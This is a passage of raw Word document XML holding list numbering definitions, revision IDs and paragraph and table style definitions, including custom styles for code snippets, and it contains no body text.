      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A53A0A9C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="64045C44" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="2F180168" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="60169F3A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="FEEAEA2A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F36E6378" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2A523CCC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="48263EE2"/>
    <w:lvl w:ilvl="0" w:tplc="FAD082CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2AEAC00C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="310886AA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="AD62338E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="5760670C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CF9E5F40" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A2844512" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4F62E6FA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8BBC1504" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="35720606"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="648A8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6691C74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7E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97C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA4CE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D09C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="808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B751F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA4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74738"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0558678A"/>
    <w:lvl w:ilvl="0" w:tplc="5CFA43EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C5108018">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9FAC28D4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C016AA4C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B9C8AA6C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="5C280422" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C5EA4BD6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E828E3CE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="02689F18" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5BA46D81"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53A0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D17CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="959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169F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B976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558F7"/>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E3098D"/>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C6E2D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05D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57EB5"/>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2A11EF"/>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9423CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="935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771C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3442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459345">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="943420220">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1307778227">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="179399477">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1771926285">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1507328887">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1175800143">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="997269300">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1869294881">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1533112726">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1410889122">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1785688284">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1095514520">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1992635374">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="944189428">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="519705859">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1000622284">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="490099929">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1298758074">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1162740168">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="569730438">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1879076883">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="609778989">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="840655966">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="488400956">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="989753139">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="570844534">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="355547681">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="5301497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Von Tish">
    <w15:presenceInfo w15:providerId="AD" w15:userId="S::lmv9443@nyu.edu::cd63c2a2-f7e6-4a21-bf4e-fc6f2b9a9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E"/>
    <w:rsid w:val="00033EC8"/>
    <w:rsid w:val="00055045"/>
    <w:rsid w:val="00056C3E"/>
    <w:rsid w:val="000950D9"/>
    <w:rsid w:val="000A4289"/>
    <w:rsid w:val="000C7432"/>
    <w:rsid w:val="000E2AB3"/>
    <w:rsid w:val="001215EC"/>
    <w:rsid w:val="00124941"/>
    <w:rsid w:val="001330E3"/>
    <w:rsid w:val="0013450B"/>
    <w:rsid w:val="0014334F"/>
    <w:rsid w:val="00183FB3"/>
    <w:rsid w:val="001911E4"/>
    <w:rsid w:val="001E55F8"/>
    <w:rsid w:val="0020271E"/>
    <w:rsid w:val="002076EB"/>
    <w:rsid w:val="002318B9"/>
    <w:rsid w:val="00244E22"/>
    <w:rsid w:val="00250115"/>
    <w:rsid w:val="002943DD"/>
    <w:rsid w:val="002C5863"/>
    <w:rsid w:val="002C6421"/>
    <w:rsid w:val="00317DD7"/>
    <w:rsid w:val="0032484C"/>
    <w:rsid w:val="00335D96"/>
    <w:rsid w:val="00336FE0"/>
    <w:rsid w:val="00343A40"/>
    <w:rsid w:val="0034742C"/>
    <w:rsid w:val="003719FB"/>
    <w:rsid w:val="003C17E2"/>
    <w:rsid w:val="003C219B"/>
    <w:rsid w:val="003E04D1"/>
    <w:rsid w:val="00400385"/>
    <w:rsid w:val="0041691D"/>
    <w:rsid w:val="00450D41"/>
    <w:rsid w:val="00455A9D"/>
    <w:rsid w:val="00485B13"/>
    <w:rsid w:val="004956AA"/>
    <w:rsid w:val="004E111C"/>
    <w:rsid w:val="004F68CB"/>
    <w:rsid w:val="005264D0"/>
    <w:rsid w:val="00542A1D"/>
    <w:rsid w:val="00547413"/>
    <w:rsid w:val="0055639E"/>
    <w:rsid w:val="0056593D"/>
    <w:rsid w:val="0058427B"/>
    <w:rsid w:val="005A6340"/>
    <w:rsid w:val="005D1352"/>
    <w:rsid w:val="005D3AC9"/>
    <w:rsid w:val="005E496E"/>
    <w:rsid w:val="0061682E"/>
    <w:rsid w:val="00646037"/>
    <w:rsid w:val="00663942"/>
    <w:rsid w:val="006903D1"/>
    <w:rsid w:val="006C5C9E"/>
    <w:rsid w:val="006E75C0"/>
    <w:rsid w:val="006F5E52"/>
    <w:rsid w:val="00707178"/>
    <w:rsid w:val="00727036"/>
    <w:rsid w:val="007B3BA5"/>
    <w:rsid w:val="007B579A"/>
    <w:rsid w:val="007B5BF7"/>
    <w:rsid w:val="007E1592"/>
    <w:rsid w:val="00884BFC"/>
    <w:rsid w:val="00884CD5"/>
    <w:rsid w:val="008C4153"/>
    <w:rsid w:val="008C4490"/>
    <w:rsid w:val="008C4B44"/>
    <w:rsid w:val="009A100A"/>
    <w:rsid w:val="009B0E35"/>
    <w:rsid w:val="00A154A9"/>
    <w:rsid w:val="00A23916"/>
    <w:rsid w:val="00A26E1B"/>
    <w:rsid w:val="00A34711"/>
    <w:rsid w:val="00A44D04"/>
    <w:rsid w:val="00AC67FD"/>
    <w:rsid w:val="00AE6477"/>
    <w:rsid w:val="00AF55AB"/>
    <w:rsid w:val="00AF642F"/>
    <w:rsid w:val="00B00365"/>
    <w:rsid w:val="00B2426F"/>
    <w:rsid w:val="00B35B88"/>
    <w:rsid w:val="00B40A5B"/>
    <w:rsid w:val="00B47DC6"/>
    <w:rsid w:val="00B51413"/>
    <w:rsid w:val="00B51483"/>
    <w:rsid w:val="00B920E2"/>
    <w:rsid w:val="00BA5F4C"/>
    <w:rsid w:val="00BF2359"/>
    <w:rsid w:val="00C0551F"/>
    <w:rsid w:val="00C30C78"/>
    <w:rsid w:val="00C32533"/>
    <w:rsid w:val="00C528B6"/>
    <w:rsid w:val="00C566FB"/>
    <w:rsid w:val="00CA4C6E"/>
    <w:rsid w:val="00CC110D"/>
    <w:rsid w:val="00D22A7D"/>
    <w:rsid w:val="00D36E2B"/>
    <w:rsid w:val="00D70417"/>
    <w:rsid w:val="00D847D3"/>
    <w:rsid w:val="00DA733E"/>
    <w:rsid w:val="00DA7649"/>
    <w:rsid w:val="00DD64D1"/>
    <w:rsid w:val="00E01DB7"/>
    <w:rsid w:val="00E03870"/>
    <w:rsid w:val="00E07CD2"/>
    <w:rsid w:val="00E34796"/>
    <w:rsid w:val="00E73F01"/>
    <w:rsid w:val="00EB2EDB"/>
    <w:rsid w:val="00EB4C33"/>
    <w:rsid w:val="00F351BE"/>
    <w:rsid w:val="00F62F5D"/>
    <w:rsid w:val="00F66181"/>
    <w:rsid w:val="00FD4229"/>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A87"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AF5ECA95-8233-4225-B058-76172603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2"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="0061682E"/>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61682E"/>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FD4229"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>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FD4229"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>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unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00646037"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="328D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2E"/>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61682E"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="328D9F" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable4-Accent2">
    <w:name w:val="Grid Table 4 Accent 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="0061682E"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>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insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="A8B97F" w:themeFill="accent2"/>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GridTable4">
    <w:name w:val="Grid Table 4"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="00616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682E"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0061682E"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0061682E"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0061682E"/>
    <w:rPr>
      <w:color w:val="2370CD" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FD4229"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="215D6A" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FD4229"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="328D9F" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="006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92"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E34796"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008C4B44"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ListTable4">
    <w:name w:val="List Table 4"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="0052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4D0"/>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Style1">
    <w:name w:val="Style1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005264D0"/>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tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:b/>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="595959" w:themeFill="text1" w:themeFillTint="A6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DCEFF4" w:themeFill="accent1" w:themeFillTint="33"/>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37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FB"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0037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FB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00646037"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="328D9F" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeChar"/>
    <w:qFormat/>
    <w:rsid w:val="001215EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00055045"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeChar">
    <w:name w:val="Code Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Code"/>
    <w:rsid w:val="001215EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>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rsid w:val="00055045"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00055045"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00055045"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="omittedforbrevity">
    <w:name w:val="omitted for brevity"/>
    <w:basedOn w:val="Code"/>
    <w:link w:val="omittedforbrevityChar"/>
    <w:qFormat/>
    <w:rsid w:val="003C219B"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0070C0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Important">
    <w:name w:val="Important"/>
    <w:basedOn w:val="Code"/>
    <w:link w:val="ImportantChar"/>
    <w:qFormat/>
    <w:rsid w:val="003C219B"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="C00000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="omittedforbrevityChar">
    <w:name w:val="omitted for brevity Char"/>
    <w:basedOn w:val="CodeChar"/>
    <w:link w:val="omittedforbrevity"/>
